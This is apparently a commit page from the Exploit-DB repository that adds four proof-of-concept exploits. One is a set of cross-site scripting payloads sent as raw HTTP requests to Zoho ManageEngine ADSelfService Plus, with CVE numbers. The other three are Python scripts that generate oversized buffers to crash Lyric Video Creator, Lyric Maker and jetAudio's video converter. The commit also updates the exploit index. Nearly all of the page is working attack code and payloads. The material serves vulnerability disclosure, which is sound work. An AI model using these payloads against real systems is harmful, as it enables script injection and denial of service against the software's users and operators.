DB: 2019-05-10

4 changes to exploits/shellcodes Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC) Lyric Maker 2.0.1.0 - Denial of Service (PoC) Convert Video jetAudio 8.1.7 - Denial of Service (PoC) Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting
jbinkleyj · May 10, 2019 · 61e7eef · 61e7eef
1 parent 5a4d21a
commit 61e7eef
Show file tree

Hide file tree

Showing 5 changed files with 117 additions and 0 deletions.
diff --git a/exploits/php/webapps/46815.txt b/exploits/php/webapps/46815.txt
@@ -0,0 +1,50 @@
+[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
+[+] Author: Ibrahim Raafat
+[+] Twitter: https://twitter.com/RaafatSEC
+[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?
+
+
+[+] TimeLine
+	[-] Nov 23, 2018	Reported
+	[-] Nov 26, 2018	Triaged
+	[-] Dec 27, 2018 	Fixed
+	[-] May 08, 2019	Public Disclosure
+
+[+] Description:
+	Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites
+
+[+] POC
+
+[-] Employee search form
+
+POST /EmployeeSearch.cc?actionId=Search HTTP/1.1
+
+searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
+searchType parameter:
+searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=
+
+
+2- Employee Search – ascending parameter
+
+/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1
+
+selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true’;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=
+
+
+3- EmpSearch.cc - searchString parameter
+
+POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1
+
+&adscsrf=
+
+4- Stored XSS in self-update layout implementation.
+
+/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
+Insert the following payload into Mobile Number field, and save
+Payload: 11111111]";a=alert,a(31337)//
+Code execute here:
+/Enrollment.do?selectedTab=Enrollment
+
+
+[+] Assigned CVE:  CVE-2018-20484,CVE-2018-20485
+[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html
diff --git a/exploits/windows/dos/46816.py b/exploits/windows/dos/46816.py
@@ -0,0 +1,19 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: https://lyricvideocreator.com/
+# Software Link: https://lyricvideocreator.com/dwl/LyricVideoCreator.exe
+# Version: 2.1
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "LyricVideo.py", it will create a new file "sample.mp3"
+# 2.- Open LyricVideoCreator.exe
+# 4.- Click on the 'Browse song' button, select the 'sample.mp3' file created and click on the 'Open' button
+# 5.- Crashed
+
+buffer = "\x41" * 5000
+f = open ("sample.mp3", "w")
+f.write(buffer)
+f.close()
diff --git a/exploits/windows/dos/46817.py b/exploits/windows/dos/46817.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Lyric Maker 2.0.1.0 - Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.jetaudio.com/
+# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
+# Version: 2.0.1.0
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "LyricMaker.py", it will create a new file "LyricMaker.txt"
+# 2.- Copy the text from the generated LyricMaker.txt file to clipboard
+# 3.- Open JetLyric.exe or Lyric Maker
+# 4.- Paste clipboard in in the field "Title"
+# 5.- Go to file -> Save Lyric...
+# 6.- Save the file with any name, e.g 'sample.jlr'
+# 7.- Crashed
+
+buffer = "\x41" * 5000
+f = open ("LyricMaker.txt", "w")
+f.write(buffer)
+f.close()
diff --git a/exploits/windows/dos/46818.py b/exploits/windows/dos/46818.py
@@ -0,0 +1,22 @@
+# -*- coding: utf-8 -*-
+# Exploit Title: Convert Video jetAudio 8.1.7 - Denial of Service (PoC)
+# Date: 08/05/2019
+# Author: Alejandra Sánchez
+# Vendor Homepage: http://www.jetaudio.com/
+# Software Link http://www.jetaudio.com/download/5fc01426-741d-41b8-a120-d890330ec672/jetAudio/JAD8107_BASIC.exe
+# Version: 8.1.7 
+# Tested on: Windows 10
+
+# Proof of Concept:
+# 1.- Run the python script "ConvertVideo.py", it will create a new file "ConvertVideo.txt"
+# 2.- Copy the text from the generated ConvertVideo.txt file to clipboard
+# 3.- Open JetVidCnv.exe or Video Converter
+# 4.- Click on the 'Add Files...' button and select a video file
+# 5.- Paste clipboard in in the field "File Naming"
+# 6.- Click on the 'Preview' button
+# 7.- Crashed
+
+buffer = "\x41" * 512
+f = open ("ConvertVideo.txt", "w")
+f.write(buffer)
+f.close()
diff --git a/files_exploits.csv b/files_exploits.csv
@@ -6411,6 +6411,9 @@ id,file,description,date,author,type,platform,port
 46803,exploits/ios/dos/46803.c,"iOS 12.1.3 - 'cfprefsd' Memory Corruption",2019-05-06,ZecOps,dos,ios,
 46806,exploits/windows/dos/46806.py,"Easy Chat Server 3.1 - 'message' Denial of Service (PoC)",2019-05-07,"Miguel Mendez Z",dos,windows,
 46810,exploits/windows/dos/46810.py,"jetAudio 8.1.7.20702 Basic - 'Enter URL' Denial of Service (PoC)",2019-05-08,"Victor Mondragón",dos,windows,
+46816,exploits/windows/dos/46816.py,"Lyric Video Creator 2.1 - '.mp3' Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46817,exploits/windows/dos/46817.py,"Lyric Maker 2.0.1.0 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
+46818,exploits/windows/dos/46818.py,"Convert Video jetAudio 8.1.7 - Denial of Service (PoC)",2019-05-09,"Alejandra Sánchez",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41241,3 +41244,4 @@ id,file,description,date,author,type,platform,port
 46799,exploits/asp/webapps/46799.txt,"microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection",2019-05-06,"felipe andrian",webapps,asp,80
 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
 46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
+46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,